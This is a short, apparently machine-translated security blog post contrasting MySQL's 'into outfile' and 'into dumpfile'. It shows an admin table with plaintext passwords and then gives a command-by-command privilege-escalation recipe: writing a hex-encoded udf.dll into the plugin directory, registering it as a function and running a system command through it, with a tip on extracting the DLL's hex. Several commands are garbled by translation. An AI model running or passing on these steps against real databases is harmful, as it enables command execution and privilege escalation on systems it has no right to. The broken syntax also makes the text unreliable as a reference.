I always thought that the two functions serve the same purpose.
Some differences have been found through simple tests.
Admin
Mysql> select * from admin;
+ ----- + ----------- + --------- +
| Uid | name | pass |
+ ---- + ------------ + --------- +
| 1 | admin | baidusb |
| 2 | root | hacksb |
| 3 | manage | nimei |
| 4 | boss | helensb |
| 5 | guanli | admin |
| 6 | superuser | mongoood |
+ ---- + ------------ + --------- +
Mysql> select * from admin into outfile '/home/seclab/test/test1.txt ';
Query OK, 1 row affected (0.00 sec)
I want to export the content to a txt file. In fact, each row of records can be completely exported.
This is suitable for importing databases.
However, into dump cannot. It can only export a row of Data!
If we want to export an executable binary file using the into outfile function
In fact, exported data will be damaged.
Because the into outfile function will write a new line at the end of the row, it is even more fatal that it will escape the line break.
In this case, the binary executable file will be damaged.
At this time, we can use into dumpfile to export a Complete Binary file that can be executed.
The into dumpfile function does not terminate or escape any column or row.
If no web script is executed, but mysql root is executed, we can use
Import the into dump function to udf. dll For Elevation of Privilege.
Mysql> show variable like '% plugin % ';
+ ---------------- + -------------------------------------------- +
| Variable_name | Value |
+ ---------------- + -------------------------------------------- +
| Plugin_dir | c :\mysql \ mysql server 5.1 \ lib/plugin |
+ ---------------- + -------------------------------------------- +
Mysql> select unhex ('udf. dll hex Code') into dumpfile 'C:/mysql server 5.1/lib/plugin/xxoo. dll ';
Mysql> select * from func; # check whether a udf has been created.
Mysql> create function MyCmd returns string soname ''c:/mysql server 5.1/lib/plugin/xxoo. dll ';
Mysql> select MyCmd ('whoam ');
TIPS:
How to obtain the hex hexadecimal value of the udf. dll file )?
We can set up a mysql environment locally and find a udf. dll file that can be used to perform the following operations:
Mysql> select hex (load_file ('C:/windows/temp/xxoo. dll ') into outfile 'C:/windows/temp/xxoo.txt ';
How do I obtain the built-in functions of the udf plug-in?
Open the keyword in the C32 or other hexadecimal editor or in notepad.
From http://hi.baidu.com/evilrapper/blog/item/5a36f290c9b54692a877a46a.html